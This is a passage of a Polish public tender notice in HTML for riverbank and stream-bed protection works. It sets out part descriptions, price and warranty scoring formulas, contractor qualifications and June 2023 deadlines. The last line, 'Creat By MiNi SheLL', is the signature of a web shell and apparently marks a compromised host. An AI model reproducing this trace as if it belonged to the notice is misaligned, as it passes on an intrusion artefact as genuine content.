złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac polegających na zabezpieczeniu wyrw brzegowych. Zakres prac obejmował będzie wykopy oraz przekopy, prace ręczne oraz mechaniczne, wykonanie wyściółki z faszyny <br/>i faszynady, zasyp wyrw brzegowych i dennych kamieniem łamanym, remont i częściowe odtworzenie kaszyc drewnianych oraz naprawę stabilizacji z belek drewnianych. Prace wykonane będą przy użyciu ciężkiego sprzętu mechanicznego m.in. koparki z brzegu oraz w korycie, wielkości koparki uzależniona będzie od szerokości koryta. Celem przedmiotowego zadania jest ochrona terenów przyległych, infrastruktury, a także mienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45243000-2 - Roboty w zakresie ochrony przybrzeżnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2 Zamawiający dokona oceny ofert niepodlegających odrzuceniu na podstawie następujących kryteriów:<br/>15.2.1 C - Cena – kryterium 80%;<br/>15.2.2	R – Okres rękojmi i gwarancji – kryterium 20%;<br/>15.3 Zamawiający przyzna wartości punktowe w kryterium, o których mowa w pkt. 15.2 z zastosowaniem następujących zasad:<br/><br/>15.3.1 W kryterium „Cena” Zamawiający przyzna wartości punktowe według następującego wzoru:<br/><br/> najniższa cena brutto<br/> C = ---------------------------------------------- x 100 x 0,8<br/> cena brutto badanej oferty <br/><br/><br/>15.3.2 W kryterium „Okres rękojmi i gwarancji – „R” <br/><br/>Ro – R min<br/>R = ------------------------------------ x 100 x 0,2<br/>R max – R min<br/><br/>gdzie:<br/>R - liczba punktów przyznana danej ofercie w kryterium okres rękojmi i gwarancji <br/>R max – maksymalny okres rękojmi i gwarancji - tj. 76 miesięcy<br/>R min – minimalny okres rękojmi i gwarancji - tj. 36 miesięcy<br/>R o – okres rękojmi i gwarancji oferty ocenianej<br/><br/>Jeżeli Wykonawca nie wpisze na Formularzu ofertowym okres rękojmi i gwarancji, Zamawiający uzna, że Wykonawca deklaruje minimalną wymaganą rękojmię i gwarancję przez Zamawiającego. W takim wypadku oferta w tym kryterium otrzyma 0 pkt. Jeżeli Wykonawca wykaże na Formularzu ofertowym rękojmię i gwarancję większą niż maksymalna rękojmia i gwarancja podlegająca punktacji, Zamawiający przyzna ofercie maksymalną liczbę punktów przewidzianą w ramach kryterium, tj. 20 pkt. <br/><br/>UWAGA:<br/>a.	Okres rękojmi i gwarancji należy podać w formularzu ofertowym w miesiącach. Jeżeli Wykonawca poda okres rękojmi i gwarancji w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy.<br/>b.	MINIMALNY wymagany przez Zamawiającego okres rękojmi i gwarancji wynosi 36 miesięcy. W przypadku podania przez Wykonawcę krótszego okresu rękojmi i gwarancji niż wymagany, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust.1 pkt 5) ustawy Prawo zamówień publicznych, jako niezgodna z treścią SWZ. W przypadku nie podania (nie wpisania) w formularzu ofertowym okresu rękojmi i gwarancji Zamawiający uzna, iż Wykonawca oferuje jedynie wymagany, minimalny okres rękojmi i gwarancji jakości tj. 36 miesięcy. <br/><br/>MAKSYMALNY punktowany okres rękojmi i gwarancji uwzględniony do oceny ofert wynosi 76 miesięcy. Jeżeli Wykonawca zaoferuje okres rękojmi i gwarancji dłuższy niż 76 miesięcy do oceny ofert zostanie przyjęty okres 76 miesięcy. <br/><br/>15.4 Kryteria będą liczone wg wzoru: P = C + R<br/><br/>gdzie:<br/>P – oznacza łączną ilość punktów przyznaną ofercie (maksymalnie 100 pkt),<br/>C – oznacza ilość punktów uzyskanych w ramach kryterium „cena” (maksymalnie 80 pkt)<br/>R – oznacza ilość punktów uzyskanych w ramach kryterium „okres rękojmi i gwarancji” (maksymalnie 20 pkt)<br/>15.5	Punktacja przyznawana ofertom w kryterium ceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/>15.6	Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. <br/>15.7	W przypadku, gdy dwie lub więcej ofert przedstawi taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie prac polegających na zapewnieniu przepływu hydraulicznego cieku w km 3+705-3+785. Zakres prac obejmował będzie naprawę gurtów z gabionów oraz zasyp wyrw dennych i brzegowych. Celem przedmiotowego zadania jest ochrona terenów przyległych, infrastruktury , a także mienia </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45243000-2 - Roboty w zakresie ochrony przybrzeżnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2 Zamawiający dokona oceny ofert niepodlegających odrzuceniu na podstawie następujących kryteriów:<br/>15.2.1 C - Cena – kryterium 80%;<br/>15.2.2	R – Okres rękojmi i gwarancji – kryterium 20%;<br/>15.3 Zamawiający przyzna wartości punktowe w kryterium, o których mowa w pkt. 15.2 z zastosowaniem następujących zasad:<br/><br/>15.3.1 W kryterium „Cena” Zamawiający przyzna wartości punktowe według następującego wzoru:<br/><br/> najniższa cena brutto<br/> C = ---------------------------------------------- x 100 x 0,8<br/> cena brutto badanej oferty <br/><br/><br/>15.3.2 W kryterium „Okres rękojmi i gwarancji – „R” <br/><br/>Ro – R min<br/>R = ------------------------------------ x 100 x 0,2<br/>R max – R min<br/><br/>gdzie:<br/>R - liczba punktów przyznana danej ofercie w kryterium okres rękojmi i gwarancji <br/>R max – maksymalny okres rękojmi i gwarancji - tj. 76 miesięcy<br/>R min – minimalny okres rękojmi i gwarancji - tj. 36 miesięcy<br/>R o – okres rękojmi i gwarancji oferty ocenianej<br/><br/>Jeżeli Wykonawca nie wpisze na Formularzu ofertowym okres rękojmi i gwarancji, Zamawiający uzna, że Wykonawca deklaruje minimalną wymaganą rękojmię i gwarancję przez Zamawiającego. W takim wypadku oferta w tym kryterium otrzyma 0 pkt. Jeżeli Wykonawca wykaże na Formularzu ofertowym rękojmię i gwarancję większą niż maksymalna rękojmia i gwarancja podlegająca punktacji, Zamawiający przyzna ofercie maksymalną liczbę punktów przewidzianą w ramach kryterium, tj. 20 pkt. <br/><br/>UWAGA:<br/>a.	Okres rękojmi i gwarancji należy podać w formularzu ofertowym w miesiącach. Jeżeli Wykonawca poda okres rękojmi i gwarancji w latach, Zamawiający przeliczy go na miesiące zgodnie z zasadą 1 rok = 12 miesięcy.<br/>b.	MINIMALNY wymagany przez Zamawiającego okres rękojmi i gwarancji wynosi 36 miesięcy. W przypadku podania przez Wykonawcę krótszego okresu rękojmi i gwarancji niż wymagany, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust.1 pkt 5) ustawy Prawo zamówień publicznych, jako niezgodna z treścią SWZ. W przypadku nie podania (nie wpisania) w formularzu ofertowym okresu rękojmi i gwarancji Zamawiający uzna, iż Wykonawca oferuje jedynie wymagany, minimalny okres rękojmi i gwarancji jakości tj. 36 miesięcy. <br/><br/>MAKSYMALNY punktowany okres rękojmi i gwarancji uwzględniony do oceny ofert wynosi 76 miesięcy. Jeżeli Wykonawca zaoferuje okres rękojmi i gwarancji dłuższy niż 76 miesięcy do oceny ofert zostanie przyjęty okres 76 miesięcy. <br/><br/>15.4 Kryteria będą liczone wg wzoru: P = C + R<br/><br/>gdzie:<br/>P – oznacza łączną ilość punktów przyznaną ofercie (maksymalnie 100 pkt),<br/>C – oznacza ilość punktów uzyskanych w ramach kryterium „cena” (maksymalnie 80 pkt)<br/>R – oznacza ilość punktów uzyskanych w ramach kryterium „okres rękojmi i gwarancji” (maksymalnie 20 pkt)<br/>15.5	Punktacja przyznawana ofertom w kryterium ceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/>15.6	Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów. <br/>15.7	W przypadku, gdy dwie lub więcej ofert przedstawi taki sam bilans ceny i pozostałych kryteriów oceny ofert, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w wyznaczonym terminie ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi i gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	Wykonawca zobowiązany jest wykazać, że w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał i prawidłowo ukończył (potwierdzone dowodami określającymi, czy roboty te zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z przepisami prawa budowlanego):<br/>Dla części 1:<br/>Wykonawca wykonał co najmniej 1 robotę o wartości 125 000 zł zawierającą w swoim zakresie wykonanie zasypu wyrwy lub narzutu kamiennego luzem w ilości nie mniejszej niż 235 m³. Posiadane doświadczenie winno wynikać z jednej umowy. Zamawiający nie dopuszcza sumowania doświadczenia na potrzeby wykazania spełnienia warunku udziału w postępowaniu dwóch lub więcej umów (dotyczy to także wykonawców wspólnie ubiegających się o zamówienie). <br/>Dla części 2:<br/>Wykonawca wykonał co najmniej 1 robotę o wartości 100 000 zł zawierającą w swoim zakresie wykonanie zasypu wyrwy lub narzutu kamiennego luzem w ilości nie mniejszej niż 170 m³. Posiadane doświadczenie winno wynikać z jednej umowy. Zamawiający nie dopuszcza sumowania doświadczenia na potrzeby wykazania spełnienia warunku udziału w postępowaniu dwóch lub więcej umów (dotyczy to także wykonawców wspólnie ubiegających się o zamówienie).<br/>Dla części 3:<br/>Wykonawca wykonał co najmniej 1 robotę o wartości 100 000 zł zawierającą w swoim zakresie wykonanie zasypu wyrwy lub narzutu kamiennego luzem w ilości nie mniejszej niż 160 m³ oraz 1 robotę zawierającą w swoim zakresie różne konstrukcje drewniane bez wyrębu w ilości co najmniej 2,346 m3. Zamawiający nie dopuszcza sumowania doświadczenia na potrzeby wykazania spełnienia warunku udziału w postępowaniu dwóch lub więcej umów (dotyczy to także wykonawców wspólnie ubiegających się o zamówienie).<br/>Dla części 4:<br/>Wykonawca wykonał co najmniej 1 robotę o wartości 140 000 zł zawierającą w swoim zakresie wykonanie zasypu wyrwy lub narzutu kamiennego luzem w ilości nie mniejszej niż 250 m³ oraz 1 robotę polegającą na budowie lub remoncie lub modernizacji zabudowy regulacyjnej lub obiektu hydrotechnicznego, w zakresie którego wykonano roboty betonowe na urządzeniach wodnych lub obiektach hydrotechnicznych w ilości co najmniej 7 m³. Zamawiający nie dopuszcza sumowania doświadczenia na potrzeby wykazania spełnienia warunku udziału w postępowaniu dwóch lub więcej umów (dotyczy to także wykonawców wspólnie ubiegających się o zamówienie).<br/><br/>b)	Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponować w okresie wykonywania zamówienia i skieruje do jego realizacji w charakterze kierownika robót osobę lub osoby posiadające kwalifikacje konieczne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 r. (tj. Dz.U. z 2021 r. poz. 2351 z póź. zm.), to jest osobę lub osoby posiadającą uprawnienia do kierowania robotami w specjalności inżynieryjnej hydrotechnicznej bez ograniczeń lub melioracyjne bez ograniczeń lub konstrukcyjno – budowlane w ograniczonym zakresie bez ograniczeń w zakresie obiektów budowlanych gospodarki wodnej i melioracji wodnych lub odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów i która jest członkiem Okręgowej Izby Inżynierów Budownictwa.<br/><br/>Samodzielna funkcja techniczna może być pełniona także przez osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w Ustawie z dnia 22.12.2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>10.4.2 oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z art. 108 i 109 ust.1 pkt. 4 ustawy Pzp. Wzór wykazu stanowi Załącznik Nr 10 do SIWZ<br/>10.4.3 oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 (lub odpowiednio 125 ust. 5) ustawy, w zakresie podstaw wykluczenia z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa. Wzór wykazu stanowi Załącznik Nr 11 do SIWZ<br/>10.4.3 oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej<br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 13 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunku opisanego w pkt. 7.2 ppkt 7.2.1 lit. a) rozdziału 7 SIWZ – wykaz zrealizowanych robót zawierający informacje dotyczące ich przedmiotu, wartości, odbiorców, dat wykonania wraz z dowodami potwierdzającymi, że roboty te zostały wykonane należycie. Wzór wykazu stanowi Załącznik Nr 7 do SIWZ.<br/>W celu potwierdzenia spełniania warunku opisanego w pkt. 7.2 ppkt 7.2.1 lit. b) rozdziału 7 SIWZ – wykaz osób, które zostaną skierowane do realizacji zamówienia zawierający informacje dotyczące ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, a także zakresu wykonywanych przez nie czynności oraz podstawie dysponowania tymi osobami. Wzór wykazu stanowi Załącznik Nr 8 do SIWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz oferty zgodny w treści z Załącznikiem Nr 1 do SWZ,<br/>2) Kosztorys ofertowy zgodnie z treścią Załącznika nr 5a – 5c do SWZ<br/>- Oświadczenia lub dokumenty składane razem z ofertą:<br/>- pełnomocnictwo, w przypadku, gdy ofertę lub załączone do niej oświadczenia lub dokumenty podpisuje pełnomocnik;<br/>- Oświadczenie Wykonawcy o zakresie wykonania zamówienia przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia zgodnie z treścią Załącznika nr 12 do SWZ (jeżeli dotyczy)<br/>- oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu, zgodny w treści z Załącznikiem nr 8 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że<br/>Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 i art. 109 ust. 1 pkt. 4) ustawy Pzp oraz<br/>art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa oraz spełnia warunki udziału w postępowaniu określone w SWZ. W<br/>przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>- Oświadczenie, zgodne w treści z Załącznikiem Nr 9 do SWZ, aktualne na dzień składania ofert, dotyczące innych<br/>podmiotów, na których zasoby powołuje się Wykonawca, celem wykazania braku istnienia wobec nich podstaw wykluczenia<br/>oraz spełniania, w zakresie, w jakim Wykonawca powołuje się na ich zasoby, warunków udziału w postępowaniu.<br/>- dowód potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami innych<br/>podmiotów, który stanowi w szczególności zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienia, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy<br/>wykonywaniu zamówienia;<br/>czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>roboty budowlane lub usługi, których wskazane zdolności dotyczą <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w<br/>rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy<br/>wpisać w Formularzu oferty.<br/>Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo należy<br/>złożyć razem z ofertą.<br/>Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 8 do<br/>SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że każdy z Wykonawców ubiegających się wspólnie o<br/>zamówienie nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz<br/>spełnia warunki udziału w postępowaniu określone w SWZ w zakresie, w którym każdy z nich wykazuje brak podstaw<br/>wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>Każdy z Wykonawców występujących wspólnie zobowiązany jest do wykazania braku podstaw do wykluczenia z<br/>postępowania o udzielenie zamówienia publicznego. W takim przypadku oświadczenia lub dokumenty wymienione w pkt<br/>10.2.2 SWZ składa każdy z Wykonawców występujących wspólnie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) Zmiana terminu realizacji przedmiotu umowy spowodowana niezawinionym i niemożliwym do uniknięcia przez<br/>Wykonawcę opóźnieniem<br/>2) Zmiana sposobu spełnienia świadczenia na skutek wystąpienia dowolnej z następujących okoliczności- pełen opis<br/>paragraf 13 umowy<br/>3) Inne zmiany spowodowane następującymi okolicznościami - pełen opis paragraf 13 umowy<br/>4) Zaistnienia innej okoliczności prawnej, technicznej lub ekonomicznej skutkującej niemożliwością wykonania umowy,<br/>zgodnie z jej treścią<br/>5) Zmiany wysokości wynagrodzenia w przypadku, gdy ilość faktycznie wykonanych robót będzie odbiegała od ilości robót<br/>wynikających wprost z zestawienia prac planowanych (dokumentacja techniczna) będącego podstawą obliczenia<br/>wynagrodzenia kosztorysowego, wynagrodzenie określone w § 3 ust. 1 Umowy zostanie proporcjonalnie zmniejszone lub<br/>zwiększone przy zachowaniu cen jednostkowych zawartych w kosztorysie ofertowym. Wartość zwiększonego lub<br/>zmniejszonego wynagrodzenia zostaną określone „Protokołem konieczności zwiększającym zakres lub zmniejszającym<br/>zakres robót ” potwierdzonym przez inspektora nadzoru i zatwierdzonym przez Zamawiającego. Z zastrzeżeniem iż nie<br/>przewiduje się wzrostu cen jednostkowych przedstawionych w kosztorysie ofertowym, jak również nie przewiduje się<br/>możliwości zmian składników cenotwórczych podanych w ofercie bez względu na zaistniałą w międzyczasie sytuację za<br/>wyjątkiem zmiany.<br/>2. Dopuszczalna jest zmiana w harmonogramie rzeczowo-finansowym polegająca na zmianie kolejności wykonania robót,<br/>zmianie terminu wykonania poszczególnych odcinków lub robót, lub zmianie zakresu robót do wykonania w poszczególnych<br/>odcinkach w przypadku zmiany technologii realizacji robót, zmiany materiałów, braku dostępu materiałów lub wystąpienia<br/>innej przyczyny powodującej, że realizacja robót w dotychczas ustalonym harmonogramie rzeczowo- finansowym jest 3. Zamawiający może wyrazić zgodę na zmianę umowy polegającą na skróceniu terminu realizacji umowy motywowaną<br/>przez Wykonawcę leżącymi po jego stronie względami, np. organizacyjnymi lub ekonomicznymi.<br/>4. Zamawiający przewiduje możliwość zmiany umowy o charakterze podmiotowym w zakresie Wykonawcy, jeżeli po stronie<br/>Wykonawcy występują podmioty działające wspólnie (np. konsorcjum, spółka cywilna) i w trakcie realizacji umowy wystąpią<br/>okoliczności uniemożliwiające lub utrudniające dalsze działanie wszystkim podmiotom tworzącym stronę wykonawczą, w<br/>szczególności gdyby została ogłoszona upadłość lub otwarta została likwidacja jednego lub kilku z tych podmiotów. W taki<br/>przypadku dopuszcza się, za uprzednią zgodą Zamawiającego, przejęcie obowiązków Wykonawcy umowy przez pozostałe<br/>podmioty tworzące stronę wykonawczą celem dokończenia realizacji umowy na niezmienionych warunkach<br/>przedmiotowych.<br/>Pełen zakres zmian określa paragraf 13 wzoru umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać elektronicznie poprzez Platformę Zakupową Zamwijącego https://przetargi.wody.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-15</span></h3>

Creat By MiNi SheLL
